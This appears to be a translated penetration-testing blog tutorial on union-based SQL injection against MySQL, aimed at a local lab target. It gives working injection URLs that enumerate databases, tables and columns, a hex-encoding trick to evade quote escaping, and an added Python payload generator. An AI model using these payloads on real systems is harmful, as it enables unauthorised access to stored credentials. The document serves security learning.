/*
Please credit the source when reposting. By: 珍惜少年时
A small note, just something to skim over lunch; experts, go easy on me.
*/
珍惜少年时's blog, focused on network security and web penetration testing
00x1 Dumping all databases:
mysql> select schema_name from information_schema.schemata;
+--------------------+
| schema_name        |
+--------------------+
| information_schema |
| challenges         |
| dvwa               |
| mysql              |
| performance_schema |
| phpcmsv9           |
| security           |
| sqlinject          |
| test               |
| test_sqlinjection  |
+--------------------+
10 rows in set (0.00 sec)
#This command is equivalent to show databases;
#So the injected statement is:
http://127.0.0.1/sqlinjection.php?id=-5 union select 1,2,group_concat(schema_name) from information_schema.schemata--
00x2 Dumping all tables:
mysql> select group_concat(table_name) from information_schema.tables where table_schema=0x73716C696E6A656374;
+--------------------------+
| group_concat(table_name) |
+--------------------------+
| admin,user,user_a        |
+--------------------------+
1 row in set (0.00 sec)
#Note:
0x73716C696E6A656374 is the hex encoding of the database name sqlinject. MySQL reads a 0x literal as a string, so the where clause needs no quote characters, which is what keeps the payload working when the application escapes quotes.
#This command is equivalent to show tables; run after a database has been selected, which here is done by the hex value in the where clause.
#So the injected statement is:
http://127.0.0.1/sqlinjection.php?id=-5 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x73716C696E6A656374--
#It can be shortened to: select table_name from information_schema.tables
That statement needs no database selected and dumps the tables of every database at once. The same goes for "column names".
00x3 Dumping all columns:
mysql> select group_concat(column_name) from information_schema.columns where table_schema=0x73716C696E6A656374;
+----------------------------------------------------------------+
| group_concat(column_name)                                      |
+----------------------------------------------------------------+
| id,username,password,id,username,password,id,username,password |
+----------------------------------------------------------------+
1 row in set (0.03 sec)
The names repeat because the three tables admin, user and user_a each have id, username and password; filtering only on table_schema does not say which column belongs to which table. To dump one table at a time, also filter on table_name (hex-encoded the same way).
So the statement is:
http://127.0.0.1/sqlinjection.php?id=-5 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=0x73716C696E6A656374--
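As an added example (not code from the original post), the Python below builds the three information_schema payloads from steps 00x1 to 00x3 out of a schema name, hex-encoding it the way the post does and reproducing the post's exact URLs. It assumes the same hypothetical target (http://127.0.0.1/sqlinjection.php?id=) and the same three-column UNION layout. It also goes slightly beyond the post: an optional table_name filter and a table:column variant resolve the repeated column names seen in 00x3.

```python
from typing import Optional

# Assumed target, taken from the post's own example URLs; not a real host.
TARGET = "http://127.0.0.1/sqlinjection.php?id="


def hex_literal(text: str) -> str:
    """Encode a string as a MySQL 0x... literal (uppercase hex, no quotes).

    MySQL reads 0x73716C696E6A656374 as the binary string 'sqlinject', so the
    where clause needs no quote characters. That is what lets the technique
    survive addslashes()/magic_quotes, which escape ' and " in the parameter.
    """
    return "0x" + text.encode("utf-8").hex().upper()


def decode_hex_literal(literal: str) -> str:
    """Reverse of hex_literal; use it to sanity-check a hex value copied from notes."""
    if not literal.lower().startswith("0x") or len(literal) % 2:
        raise ValueError("expected a 0x literal with an even number of hex digits")
    return bytes.fromhex(literal[2:]).decode("utf-8")


def union_payload(select_from: str, where: str = "") -> str:
    """Wrap an 'expr from table' fragment in the post's UNION shape.

    id=-5 matches no row, so the page renders only the UNION row; the post's
    target echoes the third of its three columns, which is where the data goes.
    """
    clause = f" where {where}" if where else ""
    return f"{TARGET}-5 union select 1,2,{select_from}{clause}--"


def payload_databases() -> str:
    """00x1: every schema name, comma-joined into one field."""
    return union_payload("group_concat(schema_name) from information_schema.schemata")


def payload_tables(schema: str) -> str:
    """00x2: every table in one schema, selected by hex literal."""
    return union_payload("group_concat(table_name) from information_schema.tables",
                         f"table_schema={hex_literal(schema)}")


def payload_columns(schema: str, table: Optional[str] = None) -> str:
    """00x3: column names of one schema.

    Without `table` this is the post's query, which mixes the columns of every
    table in the schema (id,username,password three times over for
    admin/user/user_a). Passing `table` adds a table_name filter so the
    result is unambiguous.
    """
    where = f"table_schema={hex_literal(schema)}"
    if table is not None:
        where += f" and table_name={hex_literal(table)}"
    return union_payload("group_concat(column_name) from information_schema.columns", where)


def payload_table_columns(schema: str) -> str:
    """Alternative to 00x3 that returns table:column pairs in one request.

    0x3a is ':'. group_concat output is capped by group_concat_max_len
    (1024 bytes by default), so very wide schemas may still be truncated.
    """
    select_from = ("group_concat(concat(table_name,0x3a,column_name)) "
                   "from information_schema.columns")
    return union_payload(select_from, f"table_schema={hex_literal(schema)}")


if __name__ == "__main__":
    print(hex_literal("sqlinject"))
    print(payload_databases())
    print(payload_tables("sqlinject"))
    print(payload_columns("sqlinject"))
    print(payload_columns("sqlinject", "admin"))
    print(payload_table_columns("sqlinject"))
```

Running the script prints the hex literal for sqlinject followed by the post's three URLs and the two extra variants. decode_hex_literal is there for the opposite direction: pasting a hex value back through it is the quickest way to catch a mistyped digit before sending a request.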